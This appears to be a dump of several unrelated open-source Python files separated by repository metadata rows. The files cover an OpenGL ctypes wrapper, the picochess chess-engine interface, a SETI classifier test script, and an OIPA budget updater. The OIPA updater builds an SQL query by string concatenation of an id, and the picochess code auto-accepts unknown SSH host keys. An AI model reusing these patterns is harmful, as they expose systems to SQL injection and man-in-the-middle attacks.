if attribute.startswith('gl'):
yield getattr(self, attribute)
####################################################################################################
class ParameterWrapperBase(object):
# Fixme: wrapper, translator
""" Base class for parameter wrapper. """
##############################################
def repr_string(self, parameter):
return self.__class__.__name__ + '<' + parameter.format_gl_type() + '> ' + parameter.name
##############################################
def __repr__(self):
return self.repr_string(self._parameter)
####################################################################################################
class ParameterWrapper(ParameterWrapperBase):
""" Translate a fundamental type. """
##############################################
def __init__(self, parameter):
self._parameter = parameter
self._location = parameter.location # Fixme: doublon?
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
c_parameters[self._location] = self._type(parameter)
return None
####################################################################################################
class PointerWrapper(ParameterWrapperBase):
""" Translate a pointer.
This wrapper handle all the case which are not managed by a :class:`ReferenceWrapper`, an
:class:`InputArrayWrapper` or an :class:`OutputArrayWrapper`.
These parameters are identified in the prototype as a pointer that doesn't have a size parameter
or a computed size.
If the pointer type is *char* then user must provide a string or a Python object with a
:meth:`__str__` method, else a Numpy array must be provided and the data type is only checked if
the pointer is not generic.
If the parameter value is :obj:`None`, the value is passed as is.
"""
_logger = _module_logger.getChild('PointerWrapper')
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
if self._type == ctypes.c_char and self._parameter.const: # const char *
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('const char *')
if not isinstance(parameter, bytes):
parameter = six.b(parameter)
ctypes_parameter = ctypes.c_char_p(parameter)
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._type != ctypes.c_void_p:
check_numpy_type(parameter, self._type)
ctypes_parameter = parameter.ctypes.data_as(ctypes.POINTER(self._type))
elif parameter is None:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('None')
ctypes_parameter = None # already done
else:
raise NotImplementedError
c_parameters[self._location] = ctypes_parameter
return None
####################################################################################################
class ReferenceWrapper(ParameterWrapperBase):
""" Translate a parameter passed by reference.
A parameter passed by reference is identified in the prototype as a non const pointer of a fixed
size of 1.
A reference parameter is removed in the Python prototype and the value set by the command is
pushed out in the return.
"""
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, c_parameters):
ctypes_parameter = self._type()
c_parameters[self._location] = ctypes.byref(ctypes_parameter)
to_python_converter = ValueConverter(ctypes_parameter)
return to_python_converter
####################################################################################################
class ArrayWrapper(ParameterWrapperBase):
""" Base class for Array Wrapper. """
##############################################
def __init__(self, size_parameter):
# Fixme: size_multiplier
# excepted some particular cases
pointer_parameter = size_parameter.pointer_parameters[0]
# Fixme: for debug
self._size_parameter = size_parameter
self._pointer_parameter = pointer_parameter
self._size_location = size_parameter.location
self._size_type = to_ctypes_type(size_parameter)
self._pointer_location = pointer_parameter.location
self._pointer_type = to_ctypes_type(pointer_parameter)
##############################################
def __repr__(self):
return self.repr_string(self._pointer_parameter)
####################################################################################################
class OutputArrayWrapper(ArrayWrapper):
""" Translate an output array parameter.
If the pointer is generic, then the array is passed as an Numpy array and the size is specified
in byte. <<CHECK>>
If the pointer is of \*char type, then the size is passed by the user and a string is returned.
If the user passes an Numpy array, then the data type is checked and the size is set by the
wrapper.
If the user passes a size, then a Numpy (or a list) array is created and returned.
<<size_parameter_threshold>>
"""
_logger = _module_logger.getChild('OutputArrayWrapper')
size_parameter_threshold = 20
##############################################
def from_python(self, parameter, c_parameters):
# print self._pointer_parameter.long_repr(), self._pointer_type, type(parameter)
if self._pointer_type == ctypes.c_void_p:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('void *')
# Generic pointer: thus the array data type is not specified by the API
if isinstance(parameter, np.ndarray):
# The output array is provided by user and the size is specified in byte
array = parameter
c_parameters[self._size_location] = self._size_type(array.nbytes)
ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
raise NotImplementedError
elif self._pointer_type == ctypes.c_char:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('char *')
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
ctypes_parameter = ctypes.create_string_buffer(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
to_python_converter = StringConverter(ctypes_parameter)
return to_python_converter
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
# Typed pointer
# The output array is provided by user
array = parameter
check_numpy_type(array, self._pointer_type)
c_parameters[self._size_location] = self._size_type(array.size)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('else')
# Typed pointer
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
if size_parameter >= self.size_parameter_threshold:
array = np.zeros((size_parameter), dtype=self._pointer_type)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
to_python_converter = IdentityConverter(array)
else:
array_type = self._pointer_type * size_parameter
ctypes_parameter = array_type()
to_python_converter = ListConverter(ctypes_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return to_python_converter
####################################################################################################
class InputArrayWrapper(ArrayWrapper):
_logger = _module_logger.getChild('InputArrayWrapper')
##############################################
def from_python(self, array, c_parameters):
# print array
# print self._pointer_parameter.long_repr()
# print self._pointer_type
if self._pointer_parameter.pointer == 2:
if self._pointer_type == ctypes.c_char: # Fixme: should be c_char_p
if isinstance(array, str):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string -> const char **')
size_parameter = 1
string_array_type = ctypes.c_char_p * 1
string_array = string_array_type(ctypes.c_char_p(six.b(array)))
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string array -> const char **')
size_parameter = len(array)
string_array_type = ctypes.c_char_p * size_parameter
string_array = string_array_type(*[ctypes.c_char_p(x) for x in array])
ctypes_parameter = string_array
else:
raise NotImplementedError
elif isinstance(array, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._pointer_type == ctypes.c_void_p:
size_parameter = array.nbytes
elif self._pointer_type == ctypes.c_float: # fixme
size_parameter = 1 # array.shape[0]
# else:
# size_parameter = array.nbytes
# ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
elif isinstance(array, collections.Iterable):
size_parameter = len(array)
array_type = self._pointer_type * size_parameter
if six.PY3:
if size_parameter > 1:
ctypes_parameter = array_type(array)
else:
ctypes_parameter = array_type(array[0])
else:
ctypes_parameter = array_type(array)
else:
raise ValueError(str(array))
c_parameters[self._size_location] = self._size_type(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return None
####################################################################################################
class ToPythonConverter(object):
""" Base class for C to Python converter. """
##############################################
def __init__(self, c_object):
""" The parameter *c_object* is a ctype object. """
self._c_object = c_object
####################################################################################################
class IdentityConverter(ToPythonConverter):
""" Identity converter. """
def __call__(self):
return self._c_object
class ListConverter(ToPythonConverter):
""" Convert the C object to a Python list. """
def __call__(self):
return list(self._c_object)
class ValueConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
return self._c_object.value
class StringConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
value = self._c_object.value
if value is not None:
return value.decode('ascii')
else:
return None
####################################################################################################
class CommandNotAvailable(Exception):
pass
####################################################################################################
class GlCommandWrapper(object):
_logger = _module_logger.getChild('GlCommandWrapper')
##############################################
def __init__(self, wrapper, command):
self._wrapper = wrapper
self._command = command
self._number_of_parameters = command.number_of_parameters
self._call_counter = 0
try:
self._function = getattr(self._wrapper.libGL, str(command))
except AttributeError:
raise CommandNotAvailable("OpenGL function %s was no found in libGL" % (str(command)))
# Only for simple prototype
# argument_types = [to_ctypes_type(parameter) for parameter in command.parameters]
# if argument_types:
# self._function.argtypes = argument_types
command_directive = __command_directives__.get(str(command), None)
self._parameter_wrappers = []
self._reference_parameter_wrappers = []
for parameter in command.parameters:
if parameter.type in ('GLsync', 'GLDEBUGPROC'):
raise NotImplementedError
parameter_wrapper = None
if command_directive and parameter.name in command_directive:
# Fixme: currently used for unspecified parameters (value set to 0)
pass # skip and will be set to None
elif parameter.pointer:
if parameter.size_parameter is None and parameter.array_size == 1:
# not const, array_size = 1 must be sufficient
parameter_wrapper = ReferenceWrapper(parameter)
elif parameter.size_parameter is None or parameter.computed_size:
parameter_wrapper = PointerWrapper(parameter)
else:
pass # skip and will be set by pointer parameter
elif parameter.pointer_parameters: # size parameter
# Fixme: len(pointer_parameters) > 1
# Only theses functions have len(pointer_parameters) > 1
# glAreTexturesResident
# glGetDebugMessageLog
# glPrioritizeTextures
# glShaderSource
pointer_parameter = parameter.pointer_parameters[0]
if pointer_parameter.const:
parameter_wrapper = InputArrayWrapper(parameter)
else:
parameter_wrapper = OutputArrayWrapper(parameter)
else:
parameter_wrapper = ParameterWrapper(parameter)
if parameter_wrapper is not None:
if isinstance(parameter_wrapper, ReferenceWrapper):
parameter_list = self._reference_parameter_wrappers
else:
parameter_list = self._parameter_wrappers
parameter_list.append(parameter_wrapper)
return_type = command.return_type
if return_type.type == 'GLsync':
raise NotImplementedError
elif return_type.type != 'void': # Fixme: .type or .c_type?
# Fixme: -> to func?
ctypes_type = to_ctypes_type(return_type)
if return_type.pointer:
if ctypes_type == ctypes.c_ubyte: # return type is char *
ctypes_type = ctypes.c_char_p
else:
raise NotImplementedError
self._function.restype = ctypes_type
self._return_void = False
else:
self._function.restype = None
self._return_void = True # Fixme: required or doublon?
# Getter
if command.name in Getter.commands_dict:
command_dict = Getter.commands_dict[command.name]
self._getter = {}
for enum, type_and_size in six.iteritems(command_dict):
try:
enum_value = getattr(wrapper.enums, enum)
self._getter[enum_value] = type_and_size
except AttributeError:
self._logger.warn("Enum {} not found".format(enum))
manual_page = self._manual_page()
if manual_page is not None:
doc = '%s - %s\n\n' % (self._command, manual_page.purpose)
else:
doc = ''
parameter_doc = ', '.join([repr(parameter_wrapper) for parameter_wrapper in self._parameter_wrappers])
self.__doc__ = doc + "%s (%s)" % (self._command, parameter_doc)
##############################################
def __call__(self, *args, **kwargs):
self._call_counter += 1
if len(self._parameter_wrappers) != len(args):
self._logger.warn("%s requires %u arguments, but %u was given\n %s\n %s",
str(self._command), len(self._parameter_wrappers), len(args),
self._command.prototype(),
str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]))
# Initialise the input/output parameter array
c_parameters = [None]*self._number_of_parameters
to_python_converters = []
# Set the input parameters and append python converters for output
# first process the given parameters
for parameter_wrapper, parameter in zip(self._parameter_wrappers, args):
to_python_converter = parameter_wrapper.from_python(parameter, c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
# second process the parameters by reference
for parameter_wrapper in self._reference_parameter_wrappers:
to_python_converter = parameter_wrapper.from_python(c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('Call\n'
' ' + self._command.prototype() + '\n'
' ' + str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]) + '\n'
' ' + str(c_parameters) + '\n'
' ' + str([to_python_converter.__class__.__name__
for to_python_converter in to_python_converters])
)
result = self._function(*c_parameters)
# Check error
if kwargs.get('check_error', False):
self._wrapper.check_error()
# Manage return
if to_python_converters:
output_parameters = [to_python_converter() for to_python_converter in to_python_converters]
if self._return_void:
# Extract uniq element
# Fixme: to func?, gives some cases to explain
if len(output_parameters) == 1:
output_parameter = output_parameters[0]
if isinstance(output_parameter, list) and len(output_parameter) == 1: # uniq output parameter is [a,]
# Fixme: could be worst than simpler, if we really expect a list
return output_parameter[0]
else:
return output_parameter
else:
return output_parameters
else:
return [result] + output_parameters
else:
if not self._return_void:
return result
##############################################
def __repr__(self):
return str(self._command.name) + ' ' + str(self._function.argtypes) + ' -> ' + str(self._function.restype)
##############################################
def _manual_page(self):
command_name = str(self._command)
for name in ['man' + str(i) for i in range(4, 1, -1)]:
# Fixme: use API version mapping
manual = self._wrapper._manuals[name]
if command_name in manual:
return manual[command_name]
else:
return None
##############################################
def _xml_manual_name(self):
# some commands are merged together: e.g. glVertexAttrib.xml
page = self._manual_page()
if page is not None:
page_name = page.page_name
else:
page_name = str(self._command)
return page_name + '.xml'
##############################################
def xml_manual_path(self):
return os.path.join(Config.Path.manual_path(self._wrapper.api_number), self._xml_manual_name())
##############################################
def xml_manual_url(self, local=False):
if local:
return 'file://' + self.xml_manual_path()
else:
return 'http://www.opengl.org/sdk/docs/man/xhtml/' + self._xml_manual_name()
##############################################
def manual(self, local=False):
if sys.platform.startswith('linux'):
url = self.xml_manual_url(local)
browser = 'xdg-open'
subprocess.Popen([browser, url])
# import webbrowser
# webbrowser.open(url)
else:
raise NotImplementedError
##############################################
def help(self):
# Fixme: help(instance)
print(self.__doc__)
##############################################
@property
def call_counter(self):
return self._call_counter
##############################################
def reset_call_counter(self):
self._call_counter = 0
####################################################################################################
class CtypeWrapper(object):
libGL = None
_logger = _module_logger.getChild('CtypeWrapper')
##############################################
@classmethod
def load_library(cls, libGL_name):
cls.libGL = ctypes.cdll.LoadLibrary(libGL_name)
cls.libGL.glGetString.restype = ctypes.c_char_p
GL_VERSION = int('0x1F02', 16)
version_string = cls.libGL.glGetString(GL_VERSION)
if version_string is not None:
version_string = version_string.decode('ascii')
return version_string
##############################################
def __init__(self, gl_spec, api, api_number, profile=None, manuals=None):
# self._gl_spec = gl_spec
self.api_number = api_number
self._manuals = manuals
with TimerContextManager(self._logger, 'generate_api'):
api_enums, api_commands = gl_spec.generate_api(api, api_number, profile) # 0.080288 s
self._init_enums(api_enums)
self._init_commands(api_commands)
#!# self._pythonic_wrapper = PythonicWrapper(self)
##############################################
def _init_enums(self, api_enums):
gl_enums = GlEnums()
reverse_enums = {}
for enum in api_enums:
# We don't provide more information on enumerants, use GlAPI instead
enum_name, enum_value = str(enum), int(enum)
# store enumerants and commands at the same level
setattr(self, enum_name, enum_value)
# store enumerants in a dedicated place
setattr(gl_enums, enum_name, enum_value)
reverse_enums[enum_value] = enum_name
self.enums = gl_enums
self.reverse_enums = reverse_enums
##############################################
def _init_commands(self, api_commands):
gl_commands = GlCommands()
for command in six.itervalues(api_commands):
try:
command_name = str(command)
command_wrapper = GlCommandWrapper(self, command)
# store enumerants and commands at the same level
if hasattr(PythonicWrapper, command_name):
method = getattr(PythonicWrapper, command_name)
if six.PY3:
rebinded_method = types.MethodType(method, self)
else:
rebinded_method = types.MethodType(method.__func__, self, self.__class__)
setattr(self, command_name, rebinded_method)
else:
setattr(self, command_name, command_wrapper)
# store commands in a dedicated place
setattr(gl_commands, command_name, command_wrapper)
except NotImplementedError:
self._logger.warn("Command %s is not supported by the wrapper", str(command))
except CommandNotAvailable:
self._logger.warn("Command %s is not implemented by the vendor", str(command))
self.commands = gl_commands
##############################################
def check_error(self):
error_code = self.glGetError()
if error_code:
error_message = self._error_code_message(error_code)
raise NameError(error_message)
##############################################
def _error_code_message(self, error_code):
if not error_code:
# GL_NO_ERROR: The value of this symbolic constant is guaranteed to be 0.
return 'No error has been recorded.'
else:
if error_code == self.GL_INVALID_ENUM:
return 'An unacceptable value is specified for an enumerated argument.'
elif error_code == self.GL_INVALID_VALUE:
return 'A numeric argument is out of range.'
elif error_code == self.GL_INVALID_OPERATION:
return 'The specified operation is not allowed in the current state.'
elif error_code == self.GL_INVALID_FRAMEBUFFER_OPERATION:
return 'The framebuffer object is not complete.'
elif error_code == self.GL_OUT_OF_MEMORY:
return 'There is not enough memory left to execute the command.'
elif error_code == self.GL_STACK_UNDERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to underflow.'
elif error_code == self.GL_STACK_OVERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to overflow.'
else:
raise NotImplementedError
##############################################
def error_checker(self):
return ErrorContextManager(self)
##############################################
def called_commands(self):
return [command for command in self.commands if command.call_counter]
##############################################
def reset_call_counter(self):
for command in self.commands:
command.reset_call_counter()
####################################################################################################
class ErrorContextManager(object):
##############################################
def __init__(self, wrapper):
self._wrapper = wrapper
##############################################
def __enter__(self):
pass
##############################################
def __exit__(self, type_, value, traceback):
self._wrapper.check_error()
####################################################################################################
#
# End
#
####################################################################################################
| gpl-3.0 | 1,990,613,322,482,558,700 | 36.606502 | 122 | 0.515397 | false |
LocutusOfPenguin/picochess | uci/engine.py | 1 | 9818 | # Copyright (C) 2013-2018 Jean-Francois Romang ([email protected])
# Shivkumar Shivaji ()
# Jürgen Précour ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import configparser
import spur
import paramiko
from subprocess import DEVNULL
from dgt.api import Event
from utilities import EvtObserver
import chess.uci
from chess import Board
from uci.informer import Informer
from uci.read import read_engine_ini
class UciShell(object):
"""Handle the uci engine shell."""
def __init__(self, hostname=None, username=None, key_file=None, password=None):
super(UciShell, self).__init__()
if hostname:
logging.info('connecting to [%s]', hostname)
if key_file:
self.shell = spur.SshShell(hostname=hostname, username=username, private_key_file=key_file,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = spur.SshShell(hostname=hostname, username=username, password=password,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = None
def get_spur(self):
return self.shell
class UciEngine(object):
"""Handle the uci engine communication."""
def __init__(self, file: str, uci_shell: UciShell, home=''):
super(UciEngine, self).__init__()
try:
self.shell = uci_shell.get_spur()
if home:
file = home + os.sep + file
if self.shell:
self.engine = chess.uci.spur_spawn_engine(self.shell, [file])
else:
self.engine = chess.uci.popen_engine(file, stderr=DEVNULL)
self.file = file
if self.engine:
handler = Informer()
self.engine.info_handlers.append(handler)
self.engine.uci()
else:
logging.error('engine executable [%s] not found', file)
self.options = {}
self.future = None
self.show_best = True
self.res = None
self.level_support = False
self.installed_engines = read_engine_ini(self.shell, (file.rsplit(os.sep, 1))[0])
except OSError:
logging.exception('OS error in starting engine')
except TypeError:
logging.exception('engine executable not found')
def get_name(self):
"""Get engine name."""
return self.engine.name
def get_options(self):
"""Get engine options."""
return self.engine.options
def option(self, name, value):
"""Set OptionName with value."""
self.options[name] = value
def send(self):
"""Send options to engine."""
logging.debug('setting engine with options %s', self.options)
self.engine.setoption(self.options)
def has_levels(self):
"""Return engine level support."""
has_lv = self.has_skill_level() or self.has_handicap_level() or self.has_limit_strength() or self.has_strength()
return self.level_support or has_lv
def has_skill_level(self):
"""Return engine skill level support."""
return 'Skill Level' in self.engine.options
def has_handicap_level(self):
"""Return engine handicap level support."""
return 'Handicap Level' in self.engine.options
def has_limit_strength(self):
"""Return engine limit strength support."""
return 'UCI_LimitStrength' in self.engine.options
def has_strength(self):
"""Return engine strength support."""
return 'Strength' in self.engine.options
def has_chess960(self):
"""Return chess960 support."""
return 'UCI_Chess960' in self.engine.options
def has_ponder(self):
"""Return ponder support."""
return 'Ponder' in self.engine.options
def get_file(self):
"""Get File."""
return self.file
def get_installed_engines(self):
"""Get installed engines."""
return self.installed_engines
def position(self, game: Board):
"""Set position."""
self.engine.position(game)
def quit(self):
"""Quit engine."""
if self.engine.quit(): # Ask nicely
if self.engine.terminate(): # If you won't go nicely....
if self.engine.kill(): # Right that does it!
return False
return True
def uci(self):
"""Send start uci command."""
self.engine.uci()
def stop(self, show_best=False):
"""Stop engine."""
logging.info('show_best old: %s new: %s', self.show_best, show_best)
self.show_best = show_best
if self.is_waiting():
logging.info('engine already stopped')
return self.res
try:
self.engine.stop()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
return self.future.result()
def go(self, time_dict: dict):
"""Go engine."""
self.show_best = True
time_dict['async_callback'] = self.callback
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def ponder(self):
"""Ponder engine."""
self.show_best = False
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(ponder=True, infinite=True, async_callback=self.callback)
return self.future
def brain(self, time_dict: dict):
"""Permanent brain."""
self.show_best = True
time_dict['ponder'] = True
time_dict['async_callback'] = self.callback3
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def hit(self):
"""Send a ponder hit."""
logging.info('show_best: %s', self.show_best)
self.engine.ponderhit()
self.show_best = True
def callback(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def callback3(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated') # @todo find out, why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def is_thinking(self):
"""Engine thinking."""
return not self.engine.idle and not self.engine.pondering
def is_pondering(self):
"""Engine pondering."""
return not self.engine.idle and self.engine.pondering
def is_waiting(self):
"""Engine waiting."""
return self.engine.idle
def newgame(self, game: Board):
"""Engine sometimes need this to setup internal values."""
self.engine.ucinewgame()
self.engine.position(game)
def mode_send(self, ponder: bool, analyse: bool):
"""Set engine mode."""
self.option('Ponder', ponder)
self.option('UCI_AnalyseMode', analyse)
self.send()
def chess960_send(self, flag):
"""Send UCI_Chess960 flag to engine."""
if self.has_chess960():
self.option('UCI_Chess960', flag)
self.send()
def startup(self, options: dict, game: Board, new_game=True):
"""Startup engine."""
parser = configparser.ConfigParser()
parser.optionxform = str
if not options:
if self.shell is None:
success = parser.read(self.get_file() + '.uci')
else:
try:
with self.shell.open(self.get_file() + '.uci', 'r') as file:
parser.read_file(file)
success = True
except FileNotFoundError:
success = False
if success:
options = dict(parser[parser.sections().pop()])
self.level_support = bool(options)
self.options = options
self.chess960_send(game.has_chess960_castling_rights())
if new_game:
self.newgame(game)
logging.debug('Loaded engine [%s]', self.get_name())
logging.debug('Supported options [%s]', self.get_options())
| gpl-3.0 | 5,526,358,255,197,360,000 | 33.321678 | 120 | 0.590261 | false |
sgrvinod/ml4seti-Effsubsee | test_cpu.py | 1 | 6512 | from __future__ import print_function
import argparse
import os
import time
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
from wresnet_models import *
from h5_dataloaders import *
import pandas as pd
parser = argparse.ArgumentParser(description='SETI Classifier - Test Model')
parser.add_argument('arch', metavar='PATH',
help='architecture to use')
parser.add_argument('checkpoint', metavar='PATH',
help='path to model checkpoint')
parser.add_argument('h5data', metavar='PATH',
help='path to hdf5 file with test data')
parser.add_argument('h5normalizedata', metavar='PATH',
help='path to hdf5 file with mean and std-dev tensors')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
help='number of data loading workers (default: 1)')
parser.add_argument('-b', '--batch-size', default=16, type=int,
metavar='N', help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
# Available models
# model_archs = ['resnet18', 'resnet34', 'resnet50', 'resnet86', 'resnet101', 'resnet131', 'resnet203', 'resnet152',
# 'resrnn2x2', 'resrnn2x3', 'resrnn3x2', 'resrnn3x3', 'resrnn3x10', 'wresnet28x10', 'wresnet16x8',
# 'wresnet34x2', 'wresnet40x10', 'wresnet28x20', 'densenet161', 'densenet201', 'dpn92', 'dpn98',
# 'dpn131']
model_archs = ['wresnet34x2']
def main():
"""
Load model's graph, loss function, optimizer, dataloaders.
Perform testing.
"""
global args
args = parser.parse_args()
print("\n\nChosen args:")
print(args)
assert args.arch in model_archs
model = eval(args.arch + '()').cpu()
if os.path.isfile(args.checkpoint):
print("=> Loading checkpoint '{}'".format(args.checkpoint))
checkpoint = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)
args.start_epoch = checkpoint['epoch']
best_acc = checkpoint['best_acc']
print("This model had an accuracy of %.2f on the validation set." % (best_acc,))
keys = checkpoint['state_dict'].keys()
for old_key in keys:
new_key = old_key.replace('module.', '')
checkpoint['state_dict'][new_key] = checkpoint['state_dict'].pop(old_key)
model.load_state_dict(checkpoint['state_dict'])
print("=> Loaded checkpoint '{}' (epoch {})"
.format(args.checkpoint, checkpoint['epoch']))
else:
print("=> No checkpoint found at '{}'".format(args.checkpoint))
cudnn.benchmark = False
# Store {index->UUID} mapping in the order in the test set, to keep track of the UUIDs of the data in the DataLoader
# This isn't really required since the DataLoader returns in the original order with shuffle=False, but hey...
print('UUID mapping... ')
h = h5py.File(args.h5data, 'r')
global uuid_index_mapping
uuid_index_mapping = {}
for i in range(h['uuids'][:].shape[0]):
uuid_index_mapping[i] = h['uuids'][:][i][0]
h.close()
# Normalizer
print('Normalizing signals...')
h = h5py.File(args.h5normalizedata, 'r')
mean = torch.FloatTensor(h['mean'][:])
mean = mean.permute(2, 0, 1)
std_dev = torch.FloatTensor(h['std_dev'][:])
std_dev = std_dev.permute(2, 0, 1)
h.close()
normalize = transforms.Normalize(mean=mean,
std=std_dev)
# Custom dataloader
print('Instantiating test loader')
test_loader = torch.utils.data.DataLoader(
h5TestDataset(args.h5data, transforms.Compose([normalize])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=False)
test(test_loader, model)
def test(test_loader, model):
"""
Perform testing.
"""
print('Perform testing')
model.eval() # eval mode
all_probs = []
all_uuids = []
batch_time = AverageMeter() # forward prop. time this batch
start = time.time()
softmax = torch.nn.Softmax() # need this, since there is no longer a loss layer
for i, (input, uuids) in enumerate(test_loader):
softmax.zero_grad()
# Store UUIDs associated with this batch, in the right order
uuids = list(uuids.numpy().ravel())
all_uuids.extend(uuids)
input_var = torch.autograd.Variable(input, volatile=True).cpu()
output = model(input_var)
probs = softmax(output)
all_probs.append(probs.data)
batch_time.update(time.time() - start)
start = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'.format(i, len(test_loader),
batch_time=batch_time))
all_probs = torch.cat(all_probs).cpu() # concatenate probs from all batches, move to CPU
all_uuids = [uuid_index_mapping[i] for i in all_uuids] # convert UUID indices to UUIDs
# Create dataframe and store as CSV
df1 = pd.DataFrame({'UUIDs': pd.Series(all_uuids)})
df2 = pd.DataFrame(all_probs.numpy())
df = pd.concat([df1, df2], axis=1)
csv_path = './TESTRESULTS__' + args.checkpoint.split('/')[-1] + '__' + args.h5data.split('/')[-1] + '.csv'
df.to_csv(csv_path, header=False, index=False)
print("\nSaved results to {0}\n".format(csv_path))
class AverageMeter(object):
"""
Keeps track of most recent, average, sum, and count of a metric.
"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
if __name__ == '__main__':
main()
| apache-2.0 | 1,589,429,932,012,462,800 | 34.010753 | 120 | 0.600276 | false |
schlos/OIPA-V2.1 | OIPA/iati/management/commands/total_budget_updater.py | 1 | 1856 | import datetime
# Django specific
from django.core.management.base import BaseCommand
from django.db import connection
from iati.models import Activity, Budget
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
option_list = BaseCommand.option_list
counter = 0
def handle(self, *args, **options):
parser = TotalBudgetUpdater()
parser.updateTotal()
class TotalBudgetUpdater():
def get_fields(self, cursor):
desc = cursor.description
results = [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchall()
]
return results
def update(self):
cursor = connection.cursor()
cursor.execute('SELECT activity_id, sum(value) as total_value FROM IATI_budget b GROUP BY activity_id')
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
return True
def update_single_activity(self, id):
try:
cursor = connection.cursor()
cursor.execute("SELECT activity_id, sum(value) as total_value FROM iati_budget b WHERE activity_id ='" + id + "' GROUP BY activity_id")
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
except Exception as e:
logger.info("error in " + id + ", def: update_single_activity")
if e.args:
logger.info(e.args[0])
if e.args.__len__() > 1:
logger.info(e.args[1])
if e.message:
logger.info(e.message) | agpl-3.0 | 7,268,961,908,031,832,000 | 28.47619 | 147 | 0.587823 | false |
philouc/pyhrf | python/pyhrf/sandbox/physio.py | 1 | 30326 | import os.path as op
import numpy as np
from pyhrf import Condition
from pyhrf.paradigm import Paradigm
